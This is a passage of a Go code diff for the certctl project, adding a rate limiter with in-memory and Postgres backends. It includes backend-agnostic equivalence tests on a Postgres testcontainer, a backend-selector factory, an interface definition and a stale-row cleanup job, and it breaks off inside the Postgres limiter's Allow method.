||||||
|
t.Run("NegativeCapDisabled", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "NegativeCapDisabled")
|
||||||
|
caseNegativeCapDisabled(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("EmptyKeyShortCircuits", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "EmptyKeyShortCircuits")
|
||||||
|
caseEmptyKeyShortCircuits(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("ConcurrentRaceFree", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "ConcurrentRaceFree")
|
||||||
|
caseConcurrentRaceFree(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Backend-agnostic test cases (one per behavior pinned in
|
||||||
|
// sliding_window_test.go's public-surface tests)
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
func caseAllowsUpToCap(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 3, 24*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < 3; i++ {
|
||||||
|
if err := l.Allow("k", now.Add(time.Duration(i)*time.Minute)); err != nil {
|
||||||
|
t.Fatalf("call %d should be allowed: %v", i+1, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if err := l.Allow("k", now.Add(4*time.Minute)); !errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
t.Fatalf("4th call should be rate-limited; got %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseDistinctKeysIndependent(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 1, 24*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
if err := l.Allow("k-1", now); err != nil {
|
||||||
|
t.Fatalf("first allow: %v", err)
|
||||||
|
}
|
||||||
|
if err := l.Allow("k-2", now); err != nil {
|
||||||
|
t.Fatalf("different key must have its own bucket: %v", err)
|
||||||
|
}
|
||||||
|
if err := l.Allow("k-1", now.Add(1*time.Second)); !errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
t.Fatalf("repeat key should be limited; got %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseWindowExpiry(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 2, 1*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
if err := l.Allow("k", now); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if err := l.Allow("k", now.Add(30*time.Minute)); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
// Inside window — limited.
|
||||||
|
if err := l.Allow("k", now.Add(45*time.Minute)); !errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
t.Fatalf("inside-window 3rd call should be limited: %v", err)
|
||||||
|
}
|
||||||
|
// Past window — slots reopen.
|
||||||
|
if err := l.Allow("k", now.Add(2*time.Hour)); err != nil {
|
||||||
|
t.Fatalf("past-window call should be allowed (window reset): %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseDisabledBypass(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 0, 24*time.Hour) // maxN=0 → disabled
|
||||||
|
type disablable interface {
|
||||||
|
Disabled() bool
|
||||||
|
}
|
||||||
|
if d, ok := l.(disablable); ok && !d.Disabled() {
|
||||||
|
t.Fatal("limiter with maxN=0 must report Disabled()=true")
|
||||||
|
}
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < 100; i++ {
|
||||||
|
if err := l.Allow("k", now); err != nil {
|
||||||
|
t.Fatalf("disabled limiter must allow everything: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseNegativeCapDisabled(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, -1, 24*time.Hour)
|
||||||
|
type disablable interface {
|
||||||
|
Disabled() bool
|
||||||
|
}
|
||||||
|
if d, ok := l.(disablable); ok && !d.Disabled() {
|
||||||
|
t.Fatal("negative maxN must produce a disabled limiter")
|
||||||
|
}
|
||||||
|
now := time.Now()
|
||||||
|
if err := l.Allow("k", now); err != nil {
|
||||||
|
t.Fatalf("disabled limiter must allow: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseEmptyKeyShortCircuits(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
// Empty key is the caller's defense-in-depth case — caller's
|
||||||
|
// validation upstream should reject empty-key events first. Limiter
|
||||||
|
// must not build a single shared bucket keyed by empty-key — that
|
||||||
|
// would be a chokepoint for every empty-key event.
|
||||||
|
l := mk(t, db, 1, 24*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < 50; i++ {
|
||||||
|
if err := l.Allow("", now); err != nil {
|
||||||
|
t.Fatalf("empty key must short-circuit (call %d): %v", i, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseConcurrentRaceFree(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 50, 24*time.Hour)
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
for g := 0; g < 20; g++ {
|
||||||
|
wg.Add(1)
|
||||||
|
go func(id int) {
|
||||||
|
defer wg.Done()
|
||||||
|
now := time.Now()
|
||||||
|
key := fmt.Sprintf("k-%d", id)
|
||||||
|
for i := 0; i < 30; i++ {
|
||||||
|
_ = l.Allow(key, now)
|
||||||
|
}
|
||||||
|
}(g)
|
||||||
|
}
|
||||||
|
wg.Wait()
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Postgres-only testcontainers harness — mirrors
|
||||||
|
// internal/repository/postgres/testutil_test.go's setupTestDB +
|
||||||
|
// freshSchema pattern.
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
type testDB struct {
|
||||||
|
db *sql.DB
|
||||||
|
container testcontainers.Container
|
||||||
|
}
|
||||||
|
|
||||||
|
func setupTestDB(t *testing.T) *testDB {
|
||||||
|
t.Helper()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
req := testcontainers.ContainerRequest{
|
||||||
|
Image: "postgres:16-alpine",
|
||||||
|
ExposedPorts: []string{"5432/tcp"},
|
||||||
|
Env: map[string]string{
|
||||||
|
"POSTGRES_DB": "certctl_test",
|
||||||
|
"POSTGRES_USER": "certctl",
|
||||||
|
"POSTGRES_PASSWORD": "certctl",
|
||||||
|
},
|
||||||
|
WaitingFor: wait.ForLog("database system is ready to accept connections").WithOccurrence(2),
|
||||||
|
}
|
||||||
|
container, err := testcontainers.GenericContainer(ctx, testcontainers.GenericContainerRequest{
|
||||||
|
ContainerRequest: req,
|
||||||
|
Started: true,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("start postgres container: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
host, err := container.Host(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container host: %v", err)
|
||||||
|
}
|
||||||
|
port, err := container.MappedPort(ctx, "5432")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container port: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
connStr := fmt.Sprintf("postgres://certctl:certctl@%s:%s/certctl_test?sslmode=disable", host, port.Port())
|
||||||
|
db, err := sql.Open("postgres", connStr)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("open db: %v", err)
|
||||||
|
}
|
||||||
|
// Pool size > 1 so the multi-goroutine concurrency case can hold
|
||||||
|
// multiple connections simultaneously; the row-lock arbitrates.
|
||||||
|
db.SetMaxOpenConns(8)
|
||||||
|
|
||||||
|
if err := db.Ping(); err != nil {
|
||||||
|
t.Fatalf("ping: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return &testDB{db: db, container: container}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (tdb *testDB) teardown(t *testing.T) {
|
||||||
|
t.Helper()
|
||||||
|
if tdb.db != nil {
|
||||||
|
tdb.db.Close()
|
||||||
|
}
|
||||||
|
if tdb.container != nil {
|
||||||
|
_ = tdb.container.Terminate(context.Background())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// freshSchema creates an isolated schema per test case + runs the
|
||||||
|
// rate_limit_buckets migration inside it. Returns a *sql.DB whose
|
||||||
|
// search_path is scoped to the new schema.
|
||||||
|
//
|
||||||
|
// Note: this helper takes a sub-test label (caller-supplied) so the
|
||||||
|
// schema name is deterministic-per-case + stable across runs. The
|
||||||
|
// canonical postgres testutil uses t.Name() but we're inside Run-
|
||||||
|
// nested subtests where t.Name() includes "/" — flatten it.
|
||||||
|
func (tdb *testDB) freshSchema(t *testing.T, label string) *sql.DB {
|
||||||
|
t.Helper()
|
||||||
|
schema := sanitizeSchemaName(label + "_" + t.Name())
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// One connection-scoped session so SET search_path persists.
|
||||||
|
conn, err := tdb.db.Conn(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("acquire conn: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if _, err := conn.ExecContext(ctx, fmt.Sprintf("CREATE SCHEMA IF NOT EXISTS %s", schema)); err != nil {
|
||||||
|
t.Fatalf("create schema: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := conn.ExecContext(ctx, fmt.Sprintf("SET search_path TO %s, public", schema)); err != nil {
|
||||||
|
t.Fatalf("set search_path: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Run the rate_limit_buckets migration in this schema. The migration
|
||||||
|
// is the only one that introduces our table; other migrations don't
|
||||||
|
// matter for limiter behavior.
|
||||||
|
migPath := findMigration("000046_rate_limit_buckets.up.sql")
|
||||||
|
body, err := os.ReadFile(migPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read migration: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := conn.ExecContext(ctx, string(body)); err != nil {
|
||||||
|
t.Fatalf("apply migration: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
t.Cleanup(func() {
|
||||||
|
conn.ExecContext(context.Background(), fmt.Sprintf("DROP SCHEMA IF EXISTS %s CASCADE", schema))
|
||||||
|
conn.Close()
|
||||||
|
})
|
||||||
|
|
||||||
|
// Wrap the single connection in a *sql.DB-like by returning a fresh
|
||||||
|
// pool that goes through the same search_path. Simpler: just return
|
||||||
|
// the underlying *sql.DB and SET search_path session-wide by re-
|
||||||
|
// running the SET on every checkout. The cleanest move is to use
|
||||||
|
// the per-connection helper: return a *sql.DB that's actually a
|
||||||
|
// "limited to N=1 connection with search_path pinned" handle.
|
||||||
|
//
|
||||||
|
// Workaround the easy way: build a fresh *sql.DB whose dsn embeds
|
||||||
|
// search_path as a connection-time setting, so every connection
|
||||||
|
// auto-applies it.
|
||||||
|
dsn := connDSNWithSearchPath(tdb, schema)
|
||||||
|
scoped, err := sql.Open("postgres", dsn)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("open scoped db: %v", err)
|
||||||
|
}
|
||||||
|
scoped.SetMaxOpenConns(8)
|
||||||
|
t.Cleanup(func() { scoped.Close() })
|
||||||
|
|
||||||
|
// Sanity: row exists / table exists.
|
||||||
|
if _, err := scoped.ExecContext(ctx, "SELECT 1 FROM rate_limit_buckets LIMIT 1"); err != nil && !strings.Contains(err.Error(), "no rows") {
|
||||||
|
// Empty table is fine; only a missing-table error matters.
|
||||||
|
// "no rows" never fires here (we used Exec not Query).
|
||||||
|
t.Fatalf("smoke select: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return scoped
|
||||||
|
}
|
||||||
|
|
||||||
|
func connDSNWithSearchPath(tdb *testDB, schema string) string {
|
||||||
|
// Derive the DSN by introspection of the container's host/port.
|
||||||
|
// Couldn't pre-store because freshSchema can be called many times.
|
||||||
|
ctx := context.Background()
|
||||||
|
host, _ := tdb.container.Host(ctx)
|
||||||
|
port, _ := tdb.container.MappedPort(ctx, "5432")
|
||||||
|
return fmt.Sprintf(
|
||||||
|
"postgres://certctl:certctl@%s:%s/certctl_test?sslmode=disable&search_path=%s,public",
|
||||||
|
host, port.Port(), schema,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
func sanitizeSchemaName(name string) string {
|
||||||
|
name = strings.ToLower(name)
|
||||||
|
for _, ch := range []string{"/", " ", "-", "."} {
|
||||||
|
name = strings.ReplaceAll(name, ch, "_")
|
||||||
|
}
|
||||||
|
if len(name) > 50 {
|
||||||
|
name = name[:50]
|
||||||
|
}
|
||||||
|
return "test_rl_" + name
|
||||||
|
}
|
||||||
|
|
||||||
|
func findMigration(filename string) string {
|
||||||
|
_, here, _, _ := runtime.Caller(0)
|
||||||
|
// here = .../internal/ratelimit/equivalence_test.go
|
||||||
|
// migrations = .../migrations
|
||||||
|
dir := filepath.Dir(here)
|
||||||
|
for i := 0; i < 6; i++ {
|
||||||
|
candidate := filepath.Join(dir, "migrations", filename)
|
||||||
|
if _, err := os.Stat(candidate); err == nil {
|
||||||
|
return candidate
|
||||||
|
}
|
||||||
|
dir = filepath.Dir(dir)
|
||||||
|
}
|
||||||
|
return ""
|
||||||
|
}
|
||||||
@@ -0,0 +1,65 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import (
|
||||||
|
"database/sql"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.3 (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): the backend-selector factory. Wires every
|
||||||
|
// `ratelimit.NewSlidingWindowLimiter(...)` call site in
|
||||||
|
// cmd/server/main.go through here so the operator-chosen backend
|
||||||
|
// (CERTCTL_RATE_LIMIT_BACKEND={memory,postgres}) gates the limiter
|
||||||
|
// type without each call site replicating the switch.
|
||||||
|
//
|
||||||
|
// Caller-visible behavior contract: NewLimiter(backend="memory", ...)
|
||||||
|
// returns a *SlidingWindowLimiter identical to a direct
|
||||||
|
// NewSlidingWindowLimiter call. NewLimiter(backend="postgres", ...)
|
||||||
|
// returns a *PostgresSlidingWindowLimiter with the same Allow(key, now)
|
||||||
|
// signature + the same ErrRateLimited sentinel + the same maxN<=0
|
||||||
|
// disabled semantics. Sprint 13.3's "no signature change" rule is
|
||||||
|
// what makes the swap drop-in.
|
||||||
|
//
|
||||||
|
// The mapCap argument is the in-memory backend's per-instance
|
||||||
|
// key-cap (LRU-evicted under pressure). Postgres backend has no
|
||||||
|
// equivalent — the table grows until the scheduler janitor sweeps
|
||||||
|
// stale rows; mapCap is accepted + ignored for that backend so the
|
||||||
|
// factory signature stays drop-in identical to NewSlidingWindowLimiter.
|
||||||
|
|
||||||
|
// NewLimiter returns a Limiter backed by either the in-memory
|
||||||
|
// SlidingWindowLimiter (backend="memory") or the
|
||||||
|
// PostgresSlidingWindowLimiter (backend="postgres").
|
||||||
|
//
|
||||||
|
// `backend` is validated by config.Validate() at startup; any other
|
||||||
|
// value here panics — config validation is the SoT, this is just
|
||||||
|
// defensive in case the call site somehow bypasses startup
|
||||||
|
// validation.
|
||||||
|
//
|
||||||
|
// `db` is required when backend="postgres" and ignored when
|
||||||
|
// backend="memory". The factory does not nil-check db for the
|
||||||
|
// memory branch because requiring a meaningful db handle for the
|
||||||
|
// memory path would couple every limiter call site to the database
|
||||||
|
// pool unnecessarily.
|
||||||
|
//
|
||||||
|
// `maxN <= 0` disables the limiter (both backends honor the
|
||||||
|
// opt-out — all Allow calls return nil).
|
||||||
|
func NewLimiter(backend string, db *sql.DB, maxN int, window time.Duration, mapCap int) Limiter {
|
||||||
|
switch backend {
|
||||||
|
case "memory":
|
||||||
|
return NewSlidingWindowLimiter(maxN, window, mapCap)
|
||||||
|
case "postgres":
|
||||||
|
if db == nil {
|
||||||
|
panic("ratelimit.NewLimiter: backend=postgres requires a non-nil *sql.DB (config.Validate should have caught this earlier)")
|
||||||
|
}
|
||||||
|
return NewPostgresSlidingWindowLimiter(db, maxN, window)
|
||||||
|
default:
|
||||||
|
// Defensive — config.Validate() rejects anything else at
|
||||||
|
// startup. Reaching this branch implies a coding error in a
|
||||||
|
// future call site that bypasses validation.
|
||||||
|
panic(fmt.Sprintf("ratelimit.NewLimiter: unknown backend %q (must be memory or postgres)", backend))
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -0,0 +1,54 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import "time"
|
||||||
|
|
||||||
|
// Limiter is the rate-limit primitive every caller in cmd/server +
|
||||||
|
// internal/api/handler + internal/service consumes. Two backends
|
||||||
|
// satisfy this interface:
|
||||||
|
//
|
||||||
|
// - SlidingWindowLimiter (in-memory; the historical default;
|
||||||
|
// declared in sliding_window.go).
|
||||||
|
// - PostgresSlidingWindowLimiter (cross-replica-consistent;
|
||||||
|
// declared in postgres_sliding_window.go; introduced in Phase 13
|
||||||
|
// Sprint 13.2 for the ARCH-M1 substantive close).
|
||||||
|
//
|
||||||
|
// Sprint 13.3 (next) wires every call site through the operator-
|
||||||
|
// chosen backend via the CERTCTL_RATELIMIT_BACKEND={memory,postgres}
|
||||||
|
// env var. Until then, both backends compile + tests for both pass,
|
||||||
|
// but the production call sites still construct SlidingWindowLimiter
|
||||||
|
// directly.
|
||||||
|
//
|
||||||
|
// Sprint 13.2 signature note: the prompt template specified
|
||||||
|
// `Allow(key string) error`, but the actual repo signature has been
|
||||||
|
// `Allow(key string, now time.Time) error` since the EST RFC 7030
|
||||||
|
// hardening master bundle Phase 4.1 — the `now` parameter is what
|
||||||
|
// makes the memory limiter testable against synthetic time. The
|
||||||
|
// interface matches the actual signature so the existing
|
||||||
|
// SlidingWindowLimiter satisfies Limiter without a method-set change.
|
||||||
|
//
|
||||||
|
// Per CLAUDE.md "the repo is truth" principle, code grounded against
|
||||||
|
// the live signature (not the prompt's draft).
|
||||||
|
type Limiter interface {
|
||||||
|
// Allow records a request at the given key/time and returns
|
||||||
|
// ErrRateLimited if the configured cap is exceeded inside the
|
||||||
|
// configured window. nil otherwise.
|
||||||
|
//
|
||||||
|
// Empty `key` short-circuits to nil (caller's defense-in-depth;
|
||||||
|
// caller upstream validation should reject empty-key events
|
||||||
|
// first — building a single shared bucket keyed by empty-key
|
||||||
|
// would be a chokepoint for every empty-key event).
|
||||||
|
//
|
||||||
|
// Disabled limiters (maxN <= 0) return nil for every call.
|
||||||
|
Allow(key string, now time.Time) error
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compile-time interface satisfaction checks. Drift in either
|
||||||
|
// backend's Allow signature fails the build at this file before any
|
||||||
|
// caller breaks.
|
||||||
|
var (
|
||||||
|
_ Limiter = (*SlidingWindowLimiter)(nil)
|
||||||
|
_ Limiter = (*PostgresSlidingWindowLimiter)(nil)
|
||||||
|
)
|
||||||
@@ -0,0 +1,71 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.3 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): the scheduler-invoked janitor for the postgres-backed
|
||||||
|
// rate-limit bucket table. Sweeps rows whose updated_at is older than
|
||||||
|
// the longest configured window any caller uses — these rows can
|
||||||
|
// never be at-cap (every timestamp inside has aged past the window),
|
||||||
|
// so dropping them entirely is safe.
|
||||||
|
//
|
||||||
|
// The in-memory backend's prune-on-Allow path keeps buckets short-
|
||||||
|
// lived without a separate sweep; this file is postgres-only.
|
||||||
|
|
||||||
|
// PostgresGC drives the rate_limit_buckets sweep. Constructed from the
|
||||||
|
// same *sql.DB the limiters use; the scheduler holds it as a value
|
||||||
|
// satisfying the ratelimit.GarbageCollector interface (mirrors the
|
||||||
|
// shape of acme.GarbageCollector + sessions.GarbageCollector).
|
||||||
|
type PostgresGC struct {
|
||||||
|
db *sql.DB
|
||||||
|
maxWindow time.Duration
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewPostgresGC returns a janitor that sweeps rows whose updated_at
|
||||||
|
// is older than `maxWindow` ago. Pass the longest window any caller
|
||||||
|
// in the deployment configures (the EST per-principal limiter uses
|
||||||
|
// 24h today; bump if a new caller introduces a longer window).
|
||||||
|
//
|
||||||
|
// maxWindow <= 0 disables the sweep — GarbageCollect becomes a
|
||||||
|
// no-op. Operator opt-out for sketchpad / single-replica deploys
|
||||||
|
// that still want the postgres backend (rare; the memory backend is
|
||||||
|
// the better fit).
|
||||||
|
func NewPostgresGC(db *sql.DB, maxWindow time.Duration) *PostgresGC {
|
||||||
|
return &PostgresGC{db: db, maxWindow: maxWindow}
|
||||||
|
}
|
||||||
|
|
||||||
|
// GarbageCollect deletes every rate_limit_buckets row whose
|
||||||
|
// updated_at is older than now-maxWindow. Returns the number of
|
||||||
|
// rows deleted + any error from the DELETE.
|
||||||
|
//
|
||||||
|
// Single statement, single round-trip — operates on the
|
||||||
|
// rate_limit_buckets_updated_at_idx index introduced in migration
|
||||||
|
// 000046. Idempotent: repeated calls find 0 rows.
|
||||||
|
func (g *PostgresGC) GarbageCollect(ctx context.Context) (int64, error) {
|
||||||
|
if g.maxWindow <= 0 {
|
||||||
|
return 0, nil
|
||||||
|
}
|
||||||
|
cutoff := time.Now().Add(-g.maxWindow)
|
||||||
|
res, err := g.db.ExecContext(ctx, `
|
||||||
|
DELETE FROM rate_limit_buckets
|
||||||
|
WHERE updated_at < $1
|
||||||
|
`, cutoff)
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("ratelimit-gc: delete stale buckets: %w", err)
|
||||||
|
}
|
||||||
|
n, err := res.RowsAffected()
|
||||||
|
if err != nil {
|
||||||
|
// Driver doesn't expose RowsAffected; rare. Don't fail the
|
||||||
|
// sweep — the delete already ran.
|
||||||
|
return 0, nil
|
||||||
|
}
|
||||||
|
return n, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,228 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/lib/pq"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.2 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): the cross-replica-consistent rate-limit backend. Same
|
||||||
|
// algorithm as SlidingWindowLimiter (prune-on-Allow sliding-window log)
|
||||||
|
// but the state lives in postgres so N replicas see the same per-key
|
||||||
|
// bucket. Replaces the per-process in-memory limit when the operator
|
||||||
|
// sets CERTCTL_RATELIMIT_BACKEND=postgres (wired in Sprint 13.3).
|
||||||
|
//
|
||||||
|
// Algorithm
|
||||||
|
// =========
|
||||||
|
// Each Allow call runs a single BEGIN/COMMIT transaction:
|
||||||
|
//
|
||||||
|
// 1. INSERT ... ON CONFLICT (bucket_key) DO NOTHING — ensure the
|
||||||
|
// row exists so the SELECT FOR UPDATE below has something to lock.
|
||||||
|
// 2. SELECT timestamps FROM rate_limit_buckets WHERE bucket_key=$1
|
||||||
|
// FOR UPDATE — acquire the per-key row lock for the rest of the
|
||||||
|
// transaction.
|
||||||
|
// 3. Prune timestamps older than (now - window) in Go (reusing the
|
||||||
|
// unexported pruneOlderThan helper shared with SlidingWindowLimiter
|
||||||
|
// — single source of truth for the prune semantics).
|
||||||
|
// 4. If cardinality(pruned) >= maxN: persist the pruned state without
|
||||||
|
// appending, COMMIT, return ErrRateLimited.
|
||||||
|
// 5. Else: append `now`, persist, COMMIT, return nil.
|
||||||
|
//
|
||||||
|
// SELECT FOR UPDATE serializes Allow calls for the same key across
|
||||||
|
// replicas: replicas A and B firing simultaneous Allow("k") never
|
||||||
|
// race because Postgres' row-lock arbitrates. This is the entire
|
||||||
|
// reason for the close — the memory backend's sync.Mutex only
|
||||||
|
// arbitrates within a process; pg's row lock arbitrates the cluster.
|
||||||
|
//
|
||||||
|
// Why a transaction (not a single CTE)
|
||||||
|
// ====================================
|
||||||
|
// A "compute everything in one SQL statement" approach using
|
||||||
|
// INSERT ... ON CONFLICT DO UPDATE SET timestamps = CASE WHEN ... is
|
||||||
|
// possible but the conditional logic to gate the append on the
|
||||||
|
// pruned-cardinality requires nested CTEs whose check-then-act
|
||||||
|
// semantics are hard to read + harder to convince yourself are
|
||||||
|
// race-free across all isolation levels. The explicit transaction
|
||||||
|
// version above is correct under READ COMMITTED (Postgres' default),
|
||||||
|
// matches the memory backend's read-decide-write shape line-for-line,
|
||||||
|
// and shares the same prune helper. Two extra round-trips per Allow
|
||||||
|
// vs one is acceptable for the rate-limit hot path — the operation
|
||||||
|
// is gated anyway.
|
||||||
|
//
|
||||||
|
// Sprint 13.3 will wire the scheduler janitor loop that GCs rows
|
||||||
|
// whose updated_at is older than the longest configured window; the
|
||||||
|
// migration ships the supporting btree index on updated_at.
|
||||||
|
|
||||||
|
// PostgresSlidingWindowLimiter implements Limiter against the
|
||||||
|
// rate_limit_buckets table introduced in migration 000046.
|
||||||
|
//
|
||||||
|
// Constructed via NewPostgresSlidingWindowLimiter. The zero value is
|
||||||
|
// NOT usable — the db handle is required.
|
||||||
|
//
|
||||||
|
// Concurrency: safe for concurrent Allow calls across goroutines AND
|
||||||
|
// across N replicas (the underlying SELECT FOR UPDATE serializes
|
||||||
|
// per-key access across the cluster).
|
||||||
|
type PostgresSlidingWindowLimiter struct {
|
||||||
|
db *sql.DB
|
||||||
|
maxN int
|
||||||
|
window time.Duration
|
||||||
|
disabled bool // maxN <= 0 → all Allow calls return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewPostgresSlidingWindowLimiter returns a limiter with the given
|
||||||
|
// per-key cap + window. maxN <= 0 disables the limiter (all Allow
|
||||||
|
// calls return nil); matches the memory backend's opt-out semantics
|
||||||
|
// for test harnesses + sketchpad deploys.
|
||||||
|
//
|
||||||
|
// Window defaults to 24h when zero, mirroring SlidingWindowLimiter.
|
||||||
|
//
|
||||||
|
// The db argument is required + must outlive the limiter. Construction
|
||||||
|
// itself does NOT touch the database — DDL is owned by migration
|
||||||
|
// 000046_rate_limit_buckets.up.sql which runs at boot via
|
||||||
|
// cmd/server's RunMigrations path.
|
||||||
|
func NewPostgresSlidingWindowLimiter(db *sql.DB, maxN int, window time.Duration) *PostgresSlidingWindowLimiter {
|
||||||
|
if window <= 0 {
|
||||||
|
window = 24 * time.Hour
|
||||||
|
}
|
||||||
|
disabled := maxN <= 0
|
||||||
|
return &PostgresSlidingWindowLimiter{
|
||||||
|
db: db,
|
||||||
|
maxN: maxN,
|
||||||
|
window: window,
|
||||||
|
disabled: disabled,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Allow records a request at the given (key, now) and returns
|
||||||
|
// ErrRateLimited if the configured cap is exceeded inside the
|
||||||
|
// configured window. Matches SlidingWindowLimiter.Allow byte-for-byte
|
||||||
|
// in caller-visible semantics so Sprint 13.3's backend-selector swap
|
||||||
|
// is signature-clean.
|
||||||
|
//
|
||||||
|
// The `now` argument is the timestamp the call is "happening at".
|
||||||
|
// Used as the prune cutoff (entries older than now-window are dropped)
|
||||||
|
// and as the new appended entry. Tests pass synthetic `now` values
|
||||||
|
// to exercise window-expiry deterministically; production call sites
|
||||||
|
// pass time.Now() (matching how SlidingWindowLimiter is invoked
|
||||||
|
// today — see internal/api/handler/{est,export,certificates,
|
||||||
|
// auth_breakglass}.go).
|
||||||
|
//
|
||||||
|
// Empty `key` short-circuits to nil (matches the memory backend's
|
||||||
|
// chokepoint-avoidance contract).
|
||||||
|
func (l *PostgresSlidingWindowLimiter) Allow(key string, now time.Time) error {
|
||||||
|
if l.disabled {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if key == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
tx, err := l.db.BeginTx(ctx, &sql.TxOptions{Isolation: sql.LevelReadCommitted})
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: begin tx: %w", err)
|
||||||
|
}
|
||||||
|
defer func() {
|
||||||
|
// Rollback is a no-op once the tx is committed; safe to defer
|
||||||
|
// unconditionally for the error paths.
|
||||||
|
_ = tx.Rollback()
|
||||||
|
}()
|
||||||
|
|
||||||
|
// Step 1: ensure the row exists so SELECT FOR UPDATE has something
|
||||||
|
// to lock. ON CONFLICT DO NOTHING is a no-op when the row already
|
||||||
|
// exists.
|
||||||
|
if _, err := tx.ExecContext(ctx, `
|
||||||
|
INSERT INTO rate_limit_buckets (bucket_key, timestamps, updated_at)
|
||||||
|
VALUES ($1, '{}', $2)
|
||||||
|
ON CONFLICT (bucket_key) DO NOTHING
|
||||||
|
`, key, now); err != nil {
|
